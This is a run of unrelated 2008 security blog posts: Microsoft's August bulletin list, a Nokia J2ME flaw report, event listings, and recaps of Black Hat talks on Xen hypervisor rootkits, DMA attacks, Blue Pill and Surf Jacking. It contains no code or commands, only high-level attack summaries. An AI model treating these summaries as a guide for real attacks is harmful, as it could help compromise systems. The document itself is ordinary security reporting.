I believe when it comes to the black-box testing of web applications, services are likely 5x larger than the tools industry – especially if you consider that few organizations these days haven’t had a professional vulnerability assessment (and its tough to capture international sales as well). The opposite is true for white-box testing where tool purchases a way more common due to the costs of a line-by-line source code review by a consultant. Then we have WAF sales driven by VA sales, which makes sense because an organization typically must identify a need before they can justify the fix. The same was true of network firewalls, patch management, and A/V markets.

All in the all trajectory for the entire web application security segment is going up, and fast. PCI-DSS 6.6 is certainly one stimulant, but so is all the web hacking going on these days. Great numbers Gary, thanks for sharing!

Hello again! This is Tami Gallupe (MSRC Release Manager) and I want to let you know that we just posted our August 2008 Bulletins.  This month we released 11 bulletins, one new advisory and revised an existing advisory. We also revised four bulletins to update detection changes. Here is a brief overview of the bulletins and other content we released today.

 

You may notice that we removed one of the bulletins that we had mentioned in the “Advanced Notification Service” that we released last week. We did this prior to today’s bulletin release because of a last minute quality issue. Microsoft has heard from customers that the quality of updates is very important and, as part of the process at the Microsoft Security Response Center (MSRC), Microsoft tests these updates continuously until they are ready for distribution to customers through our regularly scheduled security bulletin release.

 

Bulletins:

·        MS08-041 – Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617) – Critical

·        MS08-042 – Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048)  – Important

·        MS08-043 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066)  – Critical

·        MS08-044 – Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090)  – Critical

·        MS08-045 – Cumulative Security Update for Internet Explorer (953838) –  Critical

·        MS08-046 – Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution (952954)  – Critical

·        MS08-047 – Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733)  – Important

·        MS08-048 – Security Update for Outlook Express and Windows Mail (951066) –  Important

·        MS08-049 – Vulnerabilities in Event System Could Allow Remote Code Execution (950974)  – Important

·        MS08-050 – Vulnerability in Windows Messenger Could Allow Information Disclosure (955702)  – Important

·        MS08-051 – Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)  – Critical

 

We also revised the following bulletins to update detection changes

·        MS08-022 – major revision, added XP SP3 detection

·        MS08-033 – major revision, added XP SP3 detection

·        MS07-047 – major revision, update detection

·        MS08-040 – minor revision, update detection

 

Advisories:

·        Release Advisory 955179

·        Revised Advisory 954960

 

You can also read about this month’s Security Vulnerability Research & Defense blog at http://blogs.technet.com/swi/.

 

And finally, I also want to highlight my favorite event of the release: the webcast that starts tomorrow (Wednesday, August 13^th) at 11:00 AM PST.  To me this is a wonderful event that gives us a chance to hear from you, to take your questions and answer them live, on the air. Click here to register for TechNet Webcast: Information About Microsoft August Security Bulletins.   We look forward to hearing from you tomorrow.

 

Cheers!

  Tami

*This posting is provided "AS IS" with no warranties, and confers no rights.*

Polish security researcher Adam Gowdiak is the only person in the world (we really hope he is!) who knows the details of the recent J2ME vulnerabilities affecting to Nokia mobile phones.

The research material includes information about

reliable MIDP 2.0 privilege elevation technique for Nokia Series 40 devices

and

Nokia specific exploitation technique leading to the remote and persistent deployment of a backdoor shell application into the target Nokia Series 40 phone

Mr. Gowdiak has tested 7 Nokia Series 40 models.

Needless to say that this information in the hands of bad guys is dangerous.

And related to the devices - Nokia Series 40 shipped with 3rd edition Feature Pack 2 and 3rd edition are affected.

-

Is your site safe from SQL Injection attaks? Sign up for Beyond Security’s Automated Vulnerability Detection Service today!

Summer is almost over and schools are restarting for our student readers.

Download a *free* school schedule and other mad props from our ABC pages. There's also a cool virus-themed game.

Take a deep breath. Next summer is coming soon.

 

On 12/08/08 At 01:47 PM

There's been some media coverage on a recent vulnerability announcment. This is related to Java vulnerabilities affecting at least the Nokia S40 phone platform, and possibly other phone platforms based on a similar Java reference platform.

The vulnerability details have not been released, but if it works as advertised, this vulnerability could affect more than a hundred million mobile phones. This vulnerability is reported to enable attacker to be able to execute arbitrary code on target phones.

The S40 platform has never been targeted by a mobile phone virus or other malware. We're not expecting to see real-world attacks using this vulnerability in the near future either.

We're monitoring the situation.

On 12/08/08 At 12:09 PM

This week’s show is brought to you by Tenable Network Security and hosted, as always, by Vigabyte Virtual Hosting.

There’s no news segment in this week’s news section — Patrick Gray is on holiday in Japan, so this is a pre-recorded show. But it’s still a good one!

This week’s feature guest is New Zealand-based security researcher Paul Craig. He’s just launched iKAT, the Interactive Kiosk Attack Tool.

Ever wondered how to pwn one of those Internet kiosks in various lobbies and airports? Tune in to find out! Paul’s spent over a year working on iKAT and has just launched it at DEFCON.

This week’s sponsor interview is with Tenable Network Security’s Chief Security Officer Marcus Ranum. For those who haven’t worked in the security industry very long, Marcus is kind of a big deal(tm).

This week we’re talking to Marcus about the impact the Payment Card Industry Data Security Standard (PCI DSS) has had on industry practices.

This week's show is brought to you by Tenable Network Security and hosted, as always, by Vigabyte Virtual Hosting. There's no news segment in this week's news section -- Patrick Gray is on holiday in Japan, so this is a pre-recorded show. But it's still a good one! This week's feature guest is New Zealand-based security researcher Paul Craig. He's just launched iKAT, the Interactive Kiosk Attack Tool. Ever wondered how to pwn one of those Internet kiosks in various lobbies and airports? Tune in to find out! Paul's spent over a year working on iKAT and has just launched it at DEFCON. This week's sponsor interview is with Tenable Network Security's Chief Security Officer Marcus Ranum. For those who haven't worked in the security industry very long, Marcus is kind of a big deal(tm). This week we're talking to Marcus about the impact the Payment Card Industry Data Security Standard (PCI DSS) has had on industry practices.

A few media sources seem to be picking up a press release from the University of Michigan.

http://www.ns.umich.edu/htdocs/releases/story.php?id=6666

This reports on “CloudAV,” a project and series of papers about having antivirus  etection run “in the cloud” rather than on the PC.

http://www.eecs.umich.edu/fjgroup/cloudav/

As usual, there seems to be some misunderstanding about what is going on here.   CloudAV is not really a new approach, it is simply the use of multiple scanners, which the  AV research community has advocated for years.  It’s like having a bunch of scanners installed on your desktop, or a system like Virustotal, with the exception that the scanners run on different computers so you get a bit of performance advantage (absent the bandwidth lag/drain for submitting files to multiple systems).

-

Are you scanning your site for vulnerabilities on a daily basis?

Chapter leaders Cory Scott or Jason Witty were gracious enough to invite me to present at this months OWASP Chicago meeting. It's always fun to visit a new chapter. I've been to about a dozen so far, and meeting like minded webappsec people from various parts of the country/world. This is also a good opportunity for those who missed Black Hat to see one of the presentations live rather than relying solely on the information in the slides.

August 21 - OWASP Chicago Chapter (6:00pm – 8:30pm)
6:00 Refreshments and Networking
6:15 Bad Cocktail: Spear Phishing + Application Hacks - Rohyt Belani, Managing Partner, Intrepidus Group
7:15 Get Rich or Die Trying - Making Money on The Web, The Black Hat Way - Jeremiah Grossman, Founder & CTO of Whitehat Security

Bank of America Plaza
540 W. Madison, Downtown Chicago, 23rd floor.

*Please RSVP to jason{AT}wittys.com by 8/19/2008 if you plan to attend. Your name will need to be entered into the building's security system in order to gain access to the meeting.*

For those interested in learning more about the WhiteHat Sentinel / F5 ASM integration we have a road show scheduled (If not, go ahead and stop reading now). We’re visiting Atlanta, New York, and Chicago next week. In each city presenting will be our CEO Stephanie Fohn sharing insights on the latest website vulnerability statistics, a guest customer from a financial institution sharing their experiences on “The Challenge of Managing Application Security in Today's Environment”, and myself paired with an F5 engineer performing live VA+WAF demos. A really nice lunch will be served on us and registration is free, space is limited though. Hope to see many of you there!

August 19 (Atlanta @ 11:30am – 1:30pm)
The Four Seasons Hotel
75 Fourteenth Street Atlanta, GA 30309
Guest Speaker: Allen Stone, Senior Security Specialist, E*TRADE Financial


August 20 (New York @ 11:30am – 1:30pm)
The Tribeca Grand Hotel
2 Avenue of the Americas
New York, NY 10013
Guest Speaker: Jim Routh, Chief Information Security Officer, DTCC


August 21 (Chicago @ 11:30am – 1:30pm)
The Peninsula Chicago Hotel
108 East Superior Street
Chicago, IL 60611
(312) 337-2888
Guest Speaker: Anna Sherony, Privacy and Information Protection Officer, Sammons Financial

Update 08.11.2008: Added a video interview of Trey and myself to the bottom of the post.

Our speaking slot was informally dubbed the “power hour” due to the number of stellar presentations all booked at the same time - many of which I would have loved to attend personally. Nate McFeters & Co. unveiled the details on their GIFAR research, Microsoft announced they’ll be revealing vulnerability details to certain vendors prior to public disclosure, Joanna Rutkowska on Xen Hypervisor, etc. And making matters just a little bit more interesting, we were generously given a larger ballroom. This was scary because with a speaking time near the end of the last day combined with top-notch competition, a sparsely attended room would have been entirely likely. So when the room filled to capacity, I’m guessing of around 1,000 people (standing room only) Trey Ford and I were extremely ecstatic! Which reminds me, Trey Ford (Director of Solutions Architecture) pinched hit for Arian Evans (Director of Operations) so he could focus more time on his presentation, “Encoded, Layered and Transcoded Syntax Attacks.”

The premise for the “Get Rich or Die Trying” presentation was looking forward at the next 3-5 years considering that we’re probably going to see less fertile ground for XSS/SQLi/CSRF to be taken advantage of – that is if the good guys do their job well. So the bad guys will likely focus more attention on business logic flaws, which QA overlooks, scanners can’t identify, IDS/IPS can’t defend, and more importantly issues potentially generating 4, 5, 6 or even figures a month in illicit revenue. In many ways though this is sort of like predicting the present since just about every example we gave was grounded with a real-world public reference and backed by statistics. We also wanted this presentation was very different than what most are used to at BlackHat that tend to be deeply technical, hard to follow, and often dry. And while everyone in webappsec is transfixed on JavaScript malware issues, we chose another direction.

We designed a presentation meant to be a lot of fun, that taught things anyone could do, and perhaps by the end might have people questioning their ethics. Judging from much of the feedback I think we might have succeeded on the last point. :) RSnake was also a good sport when we ribbed him a little bit. For those interested in the slides, I quickly uploaded them to slideshare. The quality is decent (hard to see the references) and you can download the PDF. I’m working on slenderizing it now, so when I have it I’ll upload that as well, including the video when we get it.




Lastly thank you very much to everyone who came and supported us, it meant a lot.

I got into contact with Sandro from enablesecurity a couple of times before. But the last time I talked with him he gave a very interesting concept that I haven't saw before. He called it: Surf Jacking, HTTPS will NOT save you[1]. Well, what can I say, given the DNS mayhem that is going on lately, this is another hot coal that should be understand by everyone in the security industry before attackers will start to use it in the wild.

Watch the video by Sandro Gauci from enablesecurity demonstrating Surf Jack:


Surf Jacking Gmail demonstration from Sandro Gauci on Vimeo.

[1] http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/

Hi,

The link for the slides did not work in the last post, so for those interested - you can get the slides here.

Below you can find highlights of the three presentations, collectively referred to as "Xen 0wning Trilogy", that Alex, Rafal and I gave today at the Black Hat conference in Las Vegas.

Talk #1

1) Practical implementation of reliable and portable DMA attacks from Domain 0 to the Xen hypervisor memory.

2) Xen Loadable Modules :) A framework that allows to load arbitrary C code modules into the running Xen hypervisor. It uses DMA attack from the previous point to get access to Xen memory.

3) Two implementations of Xen Hypervisor Rootkits. This was the first time that working hypervisor rootkits have been presented (note the distinction between hypervisor rootkit vs. virtualization based rootkits).

Talk #2

1) Discussed how Xen 3.3 makes use of the Intel VT-d technology to protect the hypervisor.

2) Then we discussed how to bypass such VT-d protection on certain motherboards, like e.g. Intel DQ35 board.

3) An extra bonus: our attack from the previous point allows also to subvert the SMM handler and e.g. install an SMM rootkit in the system.

4) Discussed other Xen security mechanisms like driver domains, stub domains, PV GRUB and also attempted to quickly compare the state of Xen security design with the Hyper-V and ESX hypervisor.

5) Showed an exploitable heap overflow bug in the Xen hypervisor. The bug was in the FLASK module -- the NSA implementation of Xen Security Modules. FLASK, however, is not turned on by default, so even though we showed how to successfully exploit this heap overflow (which results in an escape from an unprivileged domain directly to the hypervisor), this is not a bug that can be used to 0wn The Planet. It shows, however, what happens when people start adding more and more code into the hypervisor.

6) Introduced HyperGuard -- a project done in cooperation with Phoenix Technologies. HyperGuard is going to be a SMM-based integrity scanner for Xen-like hypervisors. With HyperGuard we take a different approach then other integrity scanners do -- rather than ensuring the correctness of the code and data of the hypervisor, which might be very tricky, we instead ensure there is no untrusted code in the hypervisor, which is a much simpler task.

Talk #3

1) Provided detailed description of how to implement nested hardware based virtualization on AMD-V and VT-x (a copy of the slides from my RSA speech in April).

2) Showed how to use this nested virtualization to implement Blue Pill Boot, that can be used to virtualize the system right from the boot stage. We mentioned the best defend against this kind of system compromises is a trusted boot mechanism, either SRTM or DRTM, as implemented e.g. by Xen's tboot.

3) Consequently we showed Xen Blue Pill that is able to move a running Xen system into a virtual machine on the fly. This, on the other hand, cannot be prevented by neither the SRTM nor DRTM technology. XBP is a good example that running a legitimate hypervisor doesn't always prevent bluepill-like malware from being installed in the system.

4) Finally, discussed the XBP detection. First, we noted that all the "VMM detectors", proposed over the last years, that try to detect if there is a hypervisor running above, are useless in the case of a bluepilled Xen system. The only one approach that could be used is the direct timing analysis of the #VMEXIT times in order to distinguish between the native Xen case vs. bluepilled Xen case. We noted however, that direct timing analysis will not observe any differences when run from PV domains on AMD processors, and that it will observe little difference when run from HVM domains (7k vs. 5k cycles). The detection is easier on Intel processors, because of the unconditional #VMEXIT that we cannot get rid of.

All the three talks can be found here.

ESET, the anti-malware company for which I work, has just published its half-yearly report on global malware trends, based on data generated by automatic threat-tracking systems. Few people who read this blog will be interested in the marketing aspects of that document, but I thought you might find some of the conclusions interesting.

• We’ve noticed (actually over far longer than six months) a huge number of detections of malware that uses the Windows AutoRun facility to self-install from removable media (USB flash drives, CDs and so on). It may seem slightly surprising that other vendors haven’t flagged this trend particularly, but it doesn’t mean they don’t detect the same things: it’s just that we have a heuristic that highlights that trend. In the same way, another vendor has a detection that highlights a high proportion of iFrame exploits. We’re very aware of the ever-increasing volume of web-hosted threats, but we don’t have an exact equivalent to that heuristic, so that particular trend isn’t so obvious from our (prevalence-based) figures.
• Possibly Unwanted Applications (PUAs) and other adware and spyware detections occupy several places in our top ten. That’s not a complete novelty, but the impact of the Virtumonde Trojan in particular is dramatic. Virtumonde is a real pain: its authors work hard at hiding it from specific anti-malware products, and it can be grim trying to remove it from a system when it’s in memory. Leaving it there isn’t much of an option, either: it has a habit of pounding an infected system with so much advertising that it becomes unusable.
• There’s been a dramatic decline in the use of email to distribute new malicious attachments: of course, it remains a prime vector for the dissemination of malicious URLs. What interested me was the sheer volume of antique mass mailers like Netsky.Q, but my guess is that these are mostly generated by unprotected home machines running obsolescent Windows versions.
• Password stealing attacks on online gamers and haunters of metaverses like Second Life have been around for a while, too, but they’ve overtaken AutoRun exploits in the “top ten” over the past few months. And that’s not even taking into account other attacks like griefing and replicative “grey goo” style attacks.

David Harley
ESET Malware Intelligence Team